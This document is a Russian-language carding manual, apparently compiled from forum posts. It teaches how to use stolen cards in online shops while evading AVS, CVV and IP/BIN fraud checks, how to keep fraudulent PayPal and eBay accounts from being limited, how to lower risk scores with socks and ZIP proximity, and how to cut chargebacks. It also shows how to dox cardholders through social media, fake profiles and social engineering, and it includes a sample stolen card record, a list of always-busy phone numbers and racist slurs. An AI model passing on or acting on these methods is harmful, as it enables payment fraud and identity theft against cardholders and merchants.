В этом случае копировать данные в формы шопа можно будет быстро и эффективно. Панель задач основной системы следует разместить слева, а виртуальной – справа. Так мы здорово сэкономим горизонтальное пространство нашего экрана. На скриншоте показана рабочая система в мак ос, но в линуксе или винде рабочий стол должен выглядеть приблизительно так же. На скриншоте для наглядности показана работа в оконном режиме, но вам нужно будет работать в полноэкранном, многие шопы палят разрешение экрана, Если разрешение нестандартное, что-то наподобие 1234 на 873 – ордеру присваиваются «баллы подозрительности».
Как видете ничего сложного, только грамотно оформленное место, благодаря которому эффективность вашей работы вырастет в разы.
Всем продуктивных вбивов!

Кое что о проверках мерчей для новичков

Многие как я понял методичку не читают вообще. Тут напишу вкрадце немного инфы о мерчах, об их
сверках.
ˆ AVS
ˆ CVV
ˆ Совпадение IP / геолокации / BIN

AVS - Address Verification Service
Обеспечивает проверку введенного биллинг адреса холдера. Может быть Mutch или non-mutch. Т.е. нет каких то очков, вроде Fraud Score, есть только "зачет" или "незачет". По некоторым данным (по моим тестам так и есть) проверяется только номер дома (улицы) и zip. Т.е. если у холдера биллинг адрес 2233 pacific street 12345 (12345 - zip), мы можем ввести в поле 2233 lubaya ulica 12345. Город и штат тоже можно ставить любые, но я бы не советовал вообще менять билл адрес, если он правильный, т.к. велика вероятность ручной проверки ордера и любой америкос знает, что зип начинающийся с нуля или единицы не может соответствовать зипу штата Missouri например. На счёт зипов - юса идет справа налево снизу вверх (я про карту). Чем ниже и правеё, тем меньше первая цифра зипа и тем меньше разница во времени у нас с ними. Но плюс тут в том, что можно попробовать найти карту под адрес дропа - нужны только одинаковый зип и номер улицы. Шанс найти карту не большой, но он есть и тогда можно спокойно слать на "billing address".
Проверка по AVS доступна практически в любом юса мерче (но не во всех) и 90% мерчей ответят вам автоматическим деклайном, даже если карта будет жива и на ней будет баланс, но проверка по AVS покажет "незачет".
AVS проверяется только у карт США, Канады и UK. Возможно есть еще пара мелких стран. У
Европейских СС нет проверки AVS.

CVV – Card Verification Value
Это трёхзначный код (иногда четырехзначный, amex например), называют его по разному - CVV2, CVC2, CID, Verification number. Но смысл один - это трёхзначный код на обратной стороне карты, некая дополнительная верификация, т.к. этот код обычно не замагничен на магнитную полосу карты и не может быть прочитан через скимак.
Верификация по CVV коду есть практически у всех мерчей (кстати говоря, пресловутый avtorize.net вполне возможно, хоть на сайтах и имеётся поле для его ввода, не сверяет CVV. Я подумал об этом только сейчас, поэтому не проверял и не могу сказать точно. Но знаю, что я бил мерч avtorize.net без ввода CVV кода). И тут так-же, как и с AVS, есть только "зачет" или "незачет".
Так же 90% мерчей выдадут вам автоматический деклайн, если CVV не будет соответствовать карте.
CVV код есть у карты любой страны. (возможно у карт типа Discover его нет, вместо него пишут 000 или 0000 в поле ввода cvv кода)

Совпадение по IP / геолокации/ BIN
Эта система сравнивает местонахождение IP адреса покупателя с географическим положением холдера. Т.е. можно сравнить БИН карты. Если БИН европейский, а адрес указан США, это вызовет вопросы. Так же вызовет вопросы IP Ньй-Йорка, но часовой пояс Москвы.
Есть несколько шлюзов, проверяющих местоположение IP адреса. Каждый сайт пользуется разными шлюзами, именно поэтому в MinFraud'e Чекера IP показывает штата NY, а во Whoer.net IP будет штата MA. Так же именно поэтому мы часто ругаем socks/ssh сервисы, которые заявляют, что носок штата NY, а при проверке во вхуере оказывается, что это штат PA.
Я рекомендую пользоваться сервисом https://www.maxmind.com, на мой взгяд он болеё точен, т.к. на сколько я знаю обрабатывает информацию с нескольких шлюзов и выводит болеё реальную.
Несовпадение IP и BIN или часового пояса или IP и адреса холдера уже не имеют оценок таких, как "зачет" и "незачет". Тут будет уже добавление Fraud Score. А как известно, чем он выше, тем выше шанс ручной проверки и отмены ордера.
Так же иногда проверяют телефонный номер (работает только для США). Т.е. каждый штат имеёт свои первые три цифры. Как у нас код города, у них есть что-то подобное. В одном штате могут быть разные цифры, но принадлежать они будут одному штату.
Иногда в некоторых шопах (особенно с электроникой) помимо стандартной информации для вбива, могут быть дополнительные поля, куда нужно ввести название банка выпустившего карту и телефон службы поддержки банка. Не стоит сразу забивать на этот шоп и думать, что шоп будет звонить в банк.
Они просто сверят введенный вами банк по бину (соответствует или нет) и сверят телефон с базой данных банковских телефонов.
Помимо этого вычисляется в автоматическом режиме шанс того, что пользователь использует прокси, путем тех же proxy score. Базы у всех мерчей разные и если в одном мерче ваш IP адресс будет кристально чистым, то в другом он может иметь крайне высокий proxy score. Так что сервисы чека ip адреса на proxy score - не панацея, но всё-же не стоит пренебрегать ими.
Так же есть базы электронных почт, которые замечены в мошеннических действиях. Поэтому не стоит использовать одну и ту же почту несколько раз.
Ещё некоторые шопы проверяют адреса - если адрес подозрителен и есть в их списке, скореё всего вам ничего не вышлют. Я имею ввиду адреса посредников. Но тут уже зависит всё от разогрева шопы и легенды - в любом случае, нужно держать постоянную связь с шопом.


Как не поймать лимиты PayPal и Ebay

Если вы по роду своей деятельности сталкиваетесь с аккаунтами пэйпал или ебэй, то то, что я напишу ниже - для вас. Даже если вы не занимаетесь ни палкой, ни ебэем, всё равно будет достаточно интересно, да и так, для общего развития. Я на этих саморегах собаку съел. Не соврать, их было у меня больше сотни и 90% рано или поздно ловили лимиты. Но я вывел формулу, по которой лимиты вас не коснутся. К сожалению, одна тема, которую я сейчас тестирую, еще до конца не готова (как будет готово, я создам статью), поэтому 100% лишить вас лимитов эта статья не сможет, но поможет вам минимизировать их.
Каждый саморег PayPal и Ebay должны создаваться на новом IP адресе, на котором ранеё не было чернухи ни в палке, ни в ебэе. Так же на этом IP адресе не должно быть других аккаунтов. Нужно запомнить правило - каждому IP адресу соответствует только один! Аккаунт PayPal и Ebay (возможно позже я расскажу, как к 1 аккаунту PayPal привязать два аккаунта Ebay без бана). К сожалению, найти
такой адрес очень сложно (но об этом будет моя будущая статья), поэтому остаётся пользоваться дедиками на свой страх и риск. Потому что тут 50 на 50 - либо с дедика делали что-то в палке, либо нет.
Чтобы понять, как не получать лимиты PayPal, нужно понять принцип их действия и как они вообще работают. Во первых, PayPal лимитит аккаунты из-за слишком подозрительно активности, которая имеёт высокий риск мошеннических действий и чтобы PayPal минимизировать потери - они лимитят такой аккаунт.
Статус "You account is now Limited" присваивается роботами, скриптами, которые анализируют поведение аккаунта и при срабатывании определенных лампочек, немедленно лимитят аккаунт.
Т.е. главное понять - что лимит аккаунту присваивает робот, а не человек. Соответственно, этот робот должен действовать по какой-то определенной схеме, чтобы не лимитить всех пользователей подряд.

Получается как:
1. Вы делаете подозрительное для робота действие (например, только создали аккаунт и тут же получили на него 1000$ и прямо тут-же пытаетесь вывести всю 1000$ на другой аккаунт. Да, так никто (я надеюсь) не делает, но для примера сойдет), которое он расценивает как лампочку, которая загорелась.
2. Робот незамедлительно лимитит ваш аккаунт.
3. PayPal просят дополнительную верификацию (как правило кучу документов. Даже если сначала они попросят один документ, после его отправки вам придется отправить еще несколько).
4. Вы отправляете документы.
5. Сотрудники PayPal принимают решение - снять лимит или ограничить доступ к вашим средствам на аккаунте на 180 дней, либо вообще на всегда.
Забыл еще сказать, что лампочки - взяты для примера. У PayPal нет такого "косяк" и "не косяк", у их роботов тоже как-бы есть Fraud Score. Вы можете накосячить чуть-чуть, но если остальное у вас будет в идеале, вы не получите лимит. Другое дело, что никто не знает, где та грань, когда роботы включают лимиты.

Надеюсь, как это работает все узнали (или же знали до прочтения), теперь можно поговорить о том,
как обезопасить свои аккаунты от лимитов.
1. Я выше писал, 1 (один) IP адрес должен принадлежать только одному PayPal и Ebay аккаунтам. Так же и с банками/банковскими картами/номерами телефонов/и адресами - они должны быть уникальны для каждого аккаунта. Так же если вы льёте на кнопку на сайте, то ваш сайт должен использоваться только для одного аккаунта PayPal. Я имею ввиду, если у вас был сайт и там была кнопка ПэйПал, но аккаунт палки залимитили, то при попытке привязать новый аккаунт к этому же сайту (домену) - ваш новый пэйпал аккаунт локнут или сразу, или спустя какое-то непродолжительное время (и кажется как будто специально, пэйпал локает акки именно при получении или выводе денег).
2. Плюсом к первому пункту хочу добавить, что IP адрес должен быть постоянным, либо их должно быть 1-2 (но приучать палку к тому, что у вас 2 IP адреса вы должны сразу - день сидите на одном, второй день на другом. Либо днём на одном, по вечерам на другом. Т.е. должна быть последовательность). И не забывайте про куки - палка их любит, это не слух.

Ниже некоторые ошибки, которые приводят к лимиту:
1. Использование Proxy, TOR, или IP адреса, на которых были другие PP или Ebay аккаунты либо которые замечены в мошеннических действиях в PP.
2. Использование одного IP адреса для двух и болеё аккаунтов PayPal/Ebay.
3. Слишком быстрое движение денег на свежем аккаунте PayPal. Это одна из самых распространенных причин, после тех, что я упомянул выше. Простой пример: вы получили 100$ и через 5 минут вы пытаетесь отправить их или любую другую сумму на другой аккаунт или купить что-то, или вывести.
По точке зрения роботов PayPal, слишком быстрое движение денег является подозрительным и вы получаете лимит. Решение очень простое - когда вы получаете деньги на новый счет PayPal, пусть они полежат на счете 2-4 дня, прежде чем вы будете их выводить, переводить или тратить.
4. Еще одна причина получения лимитов - вы получаете слишком много денег за один раз. Посудите сами - у вашего PayPal аккаунта нет истории движения средств или вы всегда получали по 50-100 долларов, а тут вдруг за один раз вам на счет упала 1000 долларов или больше. Конечно, это кажется подозрительным. Тут решение зависит от многих факторов - во первых, на новую учетную запись PayPal не принимайте за раз болеё 100$ (больше - на свой страх и риск) и (тут внимание) - не держите на вашем НОВОМ счёте болеё, чем 500 баксов. Когда ваша сумма будет близка к пятистам долларов, выведите часть средств или переведите на другой аккаунт. Конечно, чем старше становится ваш аккаунт, тем большие суммы вы можете принимать и хранить на счёте.
5. Еще хотелось бы сказать об одном моменте. Я не знаю точно (точнеё не охото искать в хэлпе пэйпала), но пэйпал просит номер SSN, когда за год на вашем аккаунте пэйпала прошла определенная сумма, около 20-30к баксов. И еще они просят SSN, когда на вашем аккаунте становится слишком много переводов, около двух сотен. Но если вы принимаете платежи слишком быстро или они крупные, они могут сделать это гораздо раньше. Лучший способ борьбы с этим - получать деньги на разные аккаунты. Вы ведь не уверены, что John O Connor, имя которого вы выбрали при создании счёта ПэйПал не имеёт собственного счета в этой системе?
6. Следующая ошибка - вывод или трата точной суммы денег - той, которая была получена.
Например, на вашем счету накопилось 490 баксов и следуя правилу, которое я писал выше, вы хотите эти деньги как-то потратить. И переводите все 490 баксов на другой счет пэйпал, или покупаете что-то на сумму, которая как раз примерно 470-490 баксов. И опаньки - даю 90%, что если это ваша первая трата или вывод денег на свежем аккаунте - вы получите лимит. Решение очень простое - Всегда оставляйте на счету 10-30%, чем больше - тем лучше. Если вы больше не планируете пользоваться этим счетом, то снимите почти 90% ваших средств (но не точно, пусть это будет 89 или 88,5%). Через день-два снимите еще 80%. Если вы планируете дальше пользоваться аккаунтом - снимите 70% и через пару дней снимите еще 80% от оставшихся тридцати.
7. Бывает так, что PayPal выдаёт ошибку, при отправке денег на другой аккаунт - "Add funds in your PayPal before sending money". Пишет, что перед отправкой денег, вы должны добавить их на свой счёт пэйпал. Но у вас есть деньги на счете. Ошибка многих заключается в том, что они начинают пробовать отправить бабки снова и снова, иногда даже менять счет получателя, потом пробуют оплатить что-то в магазине... Не делайте этого. Единственное, что вы должны сделать - оставить ваш счет в покое на 2-3 дня. После получения такой ошибки, не пытайтесь отправить или снять деньги второй раз, а просто дайте аккаунту отлежаться 3 дня. В большинстве случаев, через 3 дня ошибка пропадёт. Если не пропала - подождите до 21 дня, через 21 день она пропадет с почти 100% вероятностью.
8. Ещё бывает ошибка "We can't send your money right now...", она случается на много чаще. В этом случае я тоже советую подождать немного.
9. И последнеё - иногда палка просит верифнуть вас звонком. Тыкаем отменить и тогда они попросят подтвердить другую вашу информацию - в частности банковскую карту (даже если вы её привязывали, они снова спишут один бакс и вам надо будет ввести проверочный код) или банковский счёт. После этого, с аккаунта снимают ограничение автоматически.

Теперь немного о Ebay. В сущности, основные правила такие же, что и у PayPal. Так что начнем сразу с ошибок:
Ошибка MC999 - чаще всего выпадает когда вы новый пользователь на Ebay и пытаетесь разместить товар на продажу. Бывает, выпадает сразу, бывает уже после размещения товара, через несколько часов, а товар с продажи удаляется. Не стоит паниковать, эта ошибка возникает не только у "не хороших" или "скрытых" продавцов (ведь мы по сути - скрытые (т.к. единственное, что нас отличает от обычных продавцов - левые данные), покупатель ведь после покупки получит наш товар. А как нам этот товар достался - его волновать не должно). Решение - через сутки после получения такой ошибки, позвоните в компанию Ebay (можно попросить прозвонщика) и спросите, почему так случилось. Скореё всего они скажут, что это сделано в целях защиты покупателей от мошенничества и попросят уточнить некоторую инфу. Вопросы будут вроде этих: "Является ли этот товар вашим" - ДА, "помогал ли вам кто-то размещать товар" - НЕТ, Я ВСЁ ДЕЛАЛ САМ, "Вы перепродавец или у вас этот товар в наличии" - ВСЁ В НАЛИЧИИ. Еще могут спросить откуда этот товар и т.п. Поэтому желательно предварительно придумать легенду. Нельзя говорить "я нашёл на улице", или "купил по дешевке у наркоманов". Всё должно быть законно и правдоподобно.
После вашего звонка, будет три варианта развития событий. На ебэе товары делятся на три внутренние категории, которые по сути знают только сами ебэйцы. Эти категории с низким, средним, или высоким риском. Если вы продаёте товар с низким риском (не брендовую одежду или специфический товар), то вы сможете выставлять товары на продажу.
Если товар имеёт категорию среднего риска (брендовая одежда, которую часто подделывают, или товары, на которые чаще всего жалуются (открывают диспуты) покупатели), то скореё всего вы периодически будете получать ошибку MC999.
И третий вариант, это если вы выставляете на продажу товар и категории повышенного риска. Они попросят вас подтвердить вашу личность, путем предоставления документов и контактный номер телефона. Тут уже решать вам - тратиться на отрисовки, которые не пройдут в 70% случаев или нет.
Если вы хотите продавать вещи, которые в категории высокого риска (например, шмот Adidas или наушники Monster Beats), то решение тут одно - продавать сначала товары из категории с низким риском. Это те товары, которые меньше всего подделывают (не очень популярные) и на которые меньше всего открыто диспутов. Когда ваш ебэй аккаунт получит некоторое количество положительных отзывов от покупателей (именно от покупателей), тогда можно переходить к болеё дорогим, ликвидным вещам из категории повышенного риска.
Вот в общем-то и всё, надеюсь кто-то смог дочитать до конца и я помог этому человеку.


Увеличение КПД каждого ордера

Основная схема крупного заработка в вещевом кардинге коррелирует с массовым копированием действий обычного жителя или организации при покупке тех или иных товаров онлайн. Здесь мы не рассматриваем лиц, занимающихся транспортивкой, скупом, звонками, рассылкой и тд.
Простыми словами, в обиходе массово никто не меняет биллинг-адреса в связи с переёздами и сразу после этого практически никто не закупается топовыми макбуками, предварительно забыв и восстановив пароль от аккаунта для доступа онлайн.
Чтобы слать Айфоны коробками, Вы должны делать все в точности как организации, закупающие айфоны коробками. Чтобы массово слать товар единично, Вы должны повторять действия, близкие к основному потоку, и затем их масштабировать.
Из этого следует вывод, —*шлют все шопы абсолютно. И даже те, где товар стоит $10k+. И даже на простую цц. А часто ещё и без прозвона. Речь, естесственно, не идет о ликвиде, где процент фрауд-транзакций выше среднего по рынку, есть ограничения по средней стоимости корзины и тд.
Упускаем тему подбора материала с товаром к нему, а так же уникализацию фингерпринта системы для массового вбива по одному линку. Про массовый вбив по одному линку без последствий напишу по запросу. Подробнеё про подбор материала к товару можно прочесть в Paypal Press, “Growing Your Business”, sendspace.com/file/dr4exp
Антифрауд-мониторинг среднестатистического магазина отслеживает и присваивает значение риска транзакции (Risk Score) по 45 переменным. Максимальное значение = 100, минимальное — 0.
Количество ордеров же в крупных магазинах доходит до нескольких тысяч в минуту. Глупо судить о ручной проверке такого объема информации, — все полностью автоматизировано.
Использование общедоступных Emails повышает Risk Score до 10ти пунктов. Если Вы всё-таки приверженец олдскула в данном вопросе, то закупите пачку адресов и меняйте по кругу.
Нет ничего удивительного в отсутствии высылок товара при использовании публичных сокс-сервисов.
Мало кому известно, но whoer не показатель чистоты сокса. Сокс можем иметь Proxy Score (переменная, определившая сокс в ip-адресе) будучи абсолютно чистым на Whoer.
Если сокс выдал 0 в Proxy Score (это реже, чем Вы думаете), то следующий важный фактор — дистанция от биллинг адреса до сокса. Чем меньше дистанция, тем меньше Risk Score. Близость дистанции определяется по ZIP-коду. Это ключевое для понимания место. Огромное количество людей шлют подарочные карты в другой конец страны и оплачивают кредит за iPad для своей бабушки.

Конкретнеё это видно на примерах:
Сокс
New York, NY 10116 = биллинг
Биллинг адрес
15 E 83rd St
New York, NY 10028
Шиппинг адрес
Fargo Dr 1
Cupertino, CA 95014
Email [email protected]
distance = 6
proxyScore = 0.00
riskScore = 1.39

Сокс биллинг
Биллинг NY;Mineola;30 Fairfield Avenue;11501;
Шиппинг HI;Waipahu;94-671 Kamalo St;96797
Email [email protected]
distance = 18
proxyScore = 0.00
riskScore = 0.58

Сокс биллинг
Биллинг NY;Mineola;30 Fairfield Avenue;11501;
Шиппинг NY;middletown;9-17 oliver ave;10940;;
Email [email protected]
distance = 18
proxyScore = 0.00
riskScore = 2.25

Сокс биллинг
Биллинг NY;Mineola;30 Fairfield Avenue;11501;
Шиппинг MA, Boston;1597 Washington St #412;02118;
Email [email protected]
distance = 18
proxyScore = 0.00
riskScore = 2.25

Сокс биллинг
Биллинг NY;Mineola;30 Fairfield Avenue;11501;
Шиппинг UT;Sandy;3048 Cobble Stream Cir;84093;
Email [email protected]
distance = 18
proxyScore = 0.00
riskScore = 0.60

Сокс биллинг
Биллинг NY;Mineola;30 Fairfield Avenue;11501;
Шиппинг CA;Fremont;3602 Thornton Ave. 68; 94536;
Email [email protected]
distance = 18
proxyScore = 0.00
riskScore = 0.56

А вот, например, что бывыет с Proxy Score отличным от нуля.
Сокс биллинг
Биллинг New York, NY, 10028
Шиппинг = биллинг
email [email protected]
distance = 26
proxyScore = 3.00
riskScore = 88.07


Чарджбек (chargeback)

Чарджбек (chargeback) - процедура опротестования транзакции по карте кардхолдером, при которой сумма платежа безакцептно списывается с получателя и возвращается плательщику на карту, после чего обязанность доказательства истинности транзакции ложится на получателя. К чарджбеку применима процедура оспаривания, к торой с одной стороны выступает получатель (интернет- магазин) и банк-эквайер, с другой банк-эмитент и плательщик (держатель карты). Процедура строго регламентирована рулесами и термсами Visa, MasterCard и др., в том числе имеёт временное ограничение - опротестование чарджбека возможно не позднеё чем 180 дней с момента его возникновения. В случае, если одной стороне удалось опротестовать чарджбек - удержанная ранеё сумма возвращается получателю. В случае если нет, с получателя еще удерживается штраф в размере 25$ как правило. Это по инструкации так.. По инструкции кондуктор - контролер в троллейбусе работает. В реальной жизни же все может отличатся в зависимости от страны и конкретного банка.
Рефунд (refund) - это когда покупатель просит у шоп (мерчанта) вернуть деньги а если мерчант не хочет по каким-то причинам их возвращаешь, покупатель идет в банк - говорит что он этого не покупал и просит сделать чарджбек и ему вернут деньги, а с мерчанта их спишут и оштрафуют. Если злоупотреблять чарджбеки – это портит кредитную историю кардхолдера. На мелкие сумы чарджбек делается легко и непринужденно на большие банк может устроить разбирательство с карохолдером - chargeback disputes (Оспаривание платежа). Банк проводит расследование и принимает решение о возврате средств, если считает что покупатель был обманут или транзакция была мошеннической.
Стоит отметить что иногда рефунды совершаются даже без ведома самого кардхолдера, пример человеку который админит транзикации в шопе что-то не понравилось в вашем вбиве и он просто делает отмену транзикации через биллинг без ведома кардхолдера и банка, таким образом спасая себя и свой биз. от чарджбэка и штрафа.
Наиболеё частые причини рефундов:
1. Chargeback history at another bank
2. Client called, claimed fraud asked for refund.
3. Bank negative database match
4. Customer called, demanding refund.
5. Stolen card - from processing bank
См. ниже приложение - Chargeback и Refund отличие друг от друга.

Q. Но это получается - правовой коллапс на правовом коллапсе, какой-то? Кардхолдер может покупать
все что попало за просто так и потом делать чарджбэки и получать товар нахаляву?
A. Это называется Friendly Fraud (дружественное мошенничество, дословно). Покупать по своей карте что либо а потом делать чарджбэк. Многие нигры и латиносы в пендосии так и делают, им все равно кредитная история не нужна – завтра, послезавтра их посадят.
Законопослушному гражданину такие качели не нужны так как это может повлиять на его будущеё весьма и весьма. Ему и легальные чарджбэки нежелательны – это голованя боль и потраченною на беготню по банкам время. У нас такой вид мошенничества не очень распространен ввиду ушлости
банковских работников всея севдепии. Но тем не менеё даже юморист Задорнов упоминал о нём в своём выступлении, чем вызвал немало лулза на бордах.

Q. Детально и подробно про процедуру чарджбэка?
A. Звоните (пишите, приходите) в ваш банк где у вас открыта карта – там скажут что делать. У всех процедура разная. На западе и USA все банки всегда на стороне консумента, если подписи нету на трансакции, даже права для полемики/спора нету с ними. Кардхолдер всегда деньги получит обратно, если не по рефунду так по чарджебеку. Один звoнок занимает.

Q. Сроки чарджбжэков
A. Тут всё очень сугубо индивидуально, зависит от страны, зависит от конкретного банка и его полиси.

Бывает что за 2-3 дня делают а бывает до 3 занимает времени.

Q. Через сколько времени после вбива приходит чардж?
На небольшие суммы в среднем ДО 3 мес. При условии что холдер не использует СМС оповещение о транзикаци. В USA - sms оповещение распространено мало, в EU болеё распространено.

Q. Хотелось бы свежой инфы про антифрод.
А свежей и нету. Все придумано до нас. По стостоянию на 2011 год ничего этому плане нового не придумали, кроме того что теперь помимо прозвона появился еще и видео прозвон – где вам нужно не только говорить но и показать свой фейс в камеру.
На эту тему можно долго и много писать. Поэтому - Гугл хелпс йу.

Почитайте это интересно, если нету времени сохраните, позже на КПК/телефоне читанете.

Ключевики для поиска:
Zero Liability ( у каждого банка оно разное)
bankname + zero liability
Антифродовая система Plug n Play
Претензионный цикл по Visa.
Претензионный цикл по MasterCard.


Как работают антифрауд фильтры (для нубов)

Bank negative database match – это значит что такой кардхолдер с этой картой уже делал чарджбеки.
Делал по другим биллингам/мерчантам с момента первой трансакции. У некоторых биллингов существует общий Black List. Если делал раньше покупка с чарджем/рефундом в одном биллинге то эту же карту потом может отдеклайнить при попытке покупики в другом.

Q. Чарджбек на транзикациях которые были проведены при помощи 3-D Secure - Verified by Visa и
MasterCard Secure Code не возможен в принципе?
A. Чарджбэков не возможен только с кодами 23 - cardholder not present и кодом 83 - account used without permission. Чадрж с VBV возможен, просто происходит по другому. Транзакации с вводом VBV пароля приравниваются к транзакциям с вводом пина, поэтому если произошла компрометация VBV пароля по вине кардхолдера, то шансов выиграть чарджбэк диспуте у него нету. Для шопов/мерчантов технология 3-D Secure частично решает проблему friendly fraud. Кархолдер не может сказать - это был не я. Технологии 3D secure различаются по регионам VISA и MasterCard (у визы мир делится на регионы по своему принципу). Если по умолчанию процессинг (эквайер) предлагает VBV а эмитент не поддерживает - вся ответственность на эмитенте и операция проходит без 3D-Secure кода.
Это уже проблема эмитента, что он не сертифицирован VBV.

Q. Бесчардживые карты сущствуют?
A. Матрица существует! (с) Некоторые виды припеёда при определенных сумах вбива при некоторым
стечениях обстоятельств и погоды. Но подробностей никто вам не скажет. Time is knowledge. Я лично
видел и чарджбэк и рефунд с энтропея. Хоть они и приходит намного позже.

Q. А как можно снизить вероятность чарджбэков при регулярном вбиве, есть ли какие-то меры
профилактики?
A. Использовать карты у которых exp.date близок к своему сроку окончания. Используйте карты
PLATINIUM и GOLD.

Q. Если у карты expiry date 04/12 а я вобью её 31-го марта вечерком, кардхолдер сможет сделать чардж?
A. Конечно! Это же его карта которая ему принадлежит, он и через год сможет. В этих вопросах он царь
и бог. Другое дело, что ходят слухи что при таком вбиве вероятность чарджа снижается.

Q. Я вбил на сумму не больше 50$ с карты, прошло полгода-год, сможет ли холдер сделать после
такого срочка чардж
A. Опять же вникайте про Zero Liability, напоминаю что у каждого банка оно разное.

Q. А если я буду вбивать с каждой карты небольшую сумму 5-10$ кардхолдер этого не заметит и не
сделает чарджбэк?
A. Заметит и сделает даже на 50 центов. Я гарантирую это. Если не заметит - ему помогут заметить.

Q. Можно ли делать чарджбэк с чеков?
A. Да, чарж по чекам называется - void

Q. А что делаю все эти люди ( wess, ODS ) с таким количеством карт без CVV2 кода? Они прогоняют их
через свой мерчант?
A. хз.


Пробиваем DOB разных стран!

Не один сервис по пробиву не пробивает весь земной шар, но что же делать когда нам надо узнать dob
и другую инфу не по USA и UK? Мы будем добывать всё самостоятельно. Сразу скажу что мой метод
пробива далеко не 100% и даже не всегда превышает и 50%. Но при верном подходе результат будет
положительным. И главное этот метод без затрат. Тем что я сейчас покажу удобно пользоваться при
покупке карт, не покупая их, т.к. нам достаточно той инфы которую даёт шоп.
У нас есть данные на карту:
451409|05/13|Dino Magnatta|[email protected] |+9064767928 |329 Glen Rd|M4W 2X4|Toronto|
CANADA

Первое что мы делаем, вбиваем имя фамилию холдера и страну проживания на www.pipl.com
Нажимаем поиск и видим результат. Тут может появиться большое количество анкет в соц. сетях и ссылки на прочие ресурсы. Появилось несколько человек, просматриваем каждого и выбираем наиболеё подходящего.
3алазим на фейсбук и сразу же мы видим необходимый нам dob, порывшись ещё немного на странице можем найти mmn, родствеников, жену или мужа, детей, тачку да и вообще можно найти много интересной информации.
Переходим на другую анкету этого же человека. Это так называемое резюме, где он указал свою школу, универ, место работы и професию. Вообщем его маленькая история из жизни или кем он является на этом свете.
Остальные линки будут так же на соц.сети типа myspace и hi5 или на сайты где было совпадение имёни. Но не все люди сидят на фейсбуке, кто то на myspace, twitter, bebo, hi5. И в каждой соц.сети есть приватные страницы, дабы нам это всё немешало, делаем пару фейков в каждой соц.сети, мужчину и женщину соответсвено. Фейки не должны быть вызывающими, фотки людей обычными, не модели и порно звёзды, а просто красивые люди, которых каждый желал бы иметь у себя в друзьях, а лучше сделать копию страницы какого-нибудь человека, что бы всё выгледело реально.
Можно купить пару аккаунтов фейсбука, дабы не заморачиваться с верификацией, т.к. фейсбук большое количество людей попросту не даст добавить без привязки телефона. Добавляемся в друзьяnи находим нужную инфу, ну если и это не помогло, то применяем социальную инженерию.
Так же можно пробивать dob по скайпу.
Тут всё очень просто, ищем также по имени и стране или по мылу, иногда в результатах видно и адрес, что лишает нас всяких сомнений по качеству пробива.
Ещё одна полезная услуга от google: maps.google.com, где можно найти дом холдера, узнать его бранч,
ближайшие магазины, университеты, библиотеки.

Не обламываемся искать нужное среди телефонных справочников, так же есть сайты которые предоставляют поиск по email, по зипу, по адресу. Подобных полезных сайтов много в интернете. Вот лишь маленькое количество тех, которые могут пригодиться:
www.pipl.com по миру
www.peekyou.com по миру
www.nameslocator.com по миру
www.freebackgroundchek.org по USA
www.socialregister.co.uk по UK
www.yasni.co.uk по UK
birthdatabase.com

База вечно занятых номеров:
abaster, AL 205-406-0100
Alabaster, AL 205-419-0010
Alexander City, AL 256-414-0010
Anniston, AL 256-403-0010
Anniston, AL 256-403-0080
Athens, AL 256-233-8487
Auburn/Opelika, AL 334-502-5318
Auburn/Opelika, AL 334-745-7080
Bay Minette, AL 251-580-1801
Bessemer, AL 205-461-0010
Birmingham, AL 205-271-0700
Birmingham, AL 205-271-1002
Birmingham, AL 205-396-0010
Birmingham, AL 205-443-0080
Birmingham, AL 205-443-1100
Birmingham, AL 205-986-0448
Brewton, AL 251-809-1041
Clanton, AL 205-351-0005
Cullman, AL 256-734-9963
Daleville, AL 334-598-8598
Decatur, AL 256-274-0010
Decatur, AL 256-274-0080
Dora, AL 205-341-0010
Dothan, AL 334-712-9802
Fayette, AL 205-442-0000
Florence, AL 256-275-0010
Florence, AL 256-764-4943
Fort Payne, AL 256-844-3001
Gadsden, AL 256-543-7442
Gardendale, AL 205-285-0010
Graysville, AL 205-433-0010
Guntersville, AL 256-571-9800
Haleyville, AL 205-494-0000
Hamilton, AL 205-430-0000
Huntsville, AL 256-270-0010
Huntsville, AL 256-837-1612
Jackson, AL 251-246-1577
Jasper, AL 205-302-2621
Lafayette, AL 334-864-2401
Leeds, AL 205-352-0000
Mobile, AL 251-338-2190
Mobile, AL 251-508-0010
Montgomery, AL 334-272-8223
Montgomery, AL 334-651-0010
Newton, AL 334-299-0375
Oneonta, AL 205-353-0000
Russellville, AL 256-460-4265
Selma, AL 334-418-6581
Surfside, AL 205-448-0000
Sylacauga, AL 256-391-0010
Talladega, AL 256-315-5011
Tuscaloosa, AL 205-210-0010
Tuscaloosa, AL 205-210-0080
Winfield, AL 205-395-0000
Anchorage, AK 907-222-2982
Anchorage, AK 907-272-3155
Juneau, AK 907-463-6900
Juneau, AK 907-463-6939
Casa Grande, AZ 520-413-4265
Casa Grande, AZ 520-426-4501
Coolidge, AZ 520-414-4265
Eloy, AZ 520-509-4265
Flagstaff, AZ 928-255-4265
Flagstaff, AZ 928-266-0010
Miami, AZ 928-793-4265
Nogales, AZ 520-223-4265
Phoenix, AZ 602-241-7800
Phoenix, AZ 602-282-0161
Phoenix, AZ 602-388-1010
Phoenix, AZ 602-393-0210
Phoenix, AZ 602-393-5000
Phoenix, AZ 602-532-6500
Phoenix, AZ 602-567-0003
Phoenix, AZ 602-745-2500
Prescott, AZ 928-277-4265
Prescott, AZ 928-717-9481
Safford, AZ 928-792-4265
Sedona, AZ 928-204-7821
Sierra Vista, AZ 520-452-5901
Tucson, AZ 520-243-0010
Tucson, AZ 520-668-9550
Tucson, AZ 520-740-1200
ucson, AZ 520-917-2200
Wickenburg, AZ 928-415-4265
Winslow, AZ 928-224-4265
Yuma, AZ 928-257-4265
Yuma, AZ 928-782-0700
Arkadelphia, AR 870-568-0007
Batesville, AR 870-569-0007
Benton, AR 501-574-0007
Bentonville, AR 479-464-1071
Bentonville, AR 479-464-7759
Brinkley, AR 870-527-0007
Camden, AR 870-498-0007
Cherry Valley, AR 870-525-0007
Conway, AR 501-339-0007
El Dorado, AR 870-639-0007
El Dorado, AR 870-864-8997
Fayetteville, AR 479-595-0010
Fayetteville, AR 479-935-9550
Forrest City, AR 870-594-0007
Fort Smith, AR 479-668-0010
Fort Smith, AR 479-668-0080
Helena, AR 870-228-0007
Hope, AR 870-474-0007
Hot Springs, AR 501-620-4370
Hot Springs, AR 501-627-9050
Jacksonville, AR 501-985-1621
Jonesboro, AR 870-253-2000
Jonesboro, AR 870-930-1417
Little Rock, AR 501-553-9550
Little Rock, AR 501-604-2193
Little Rock, AR 501-801-1100
Little Rock, AR 501-859-0010
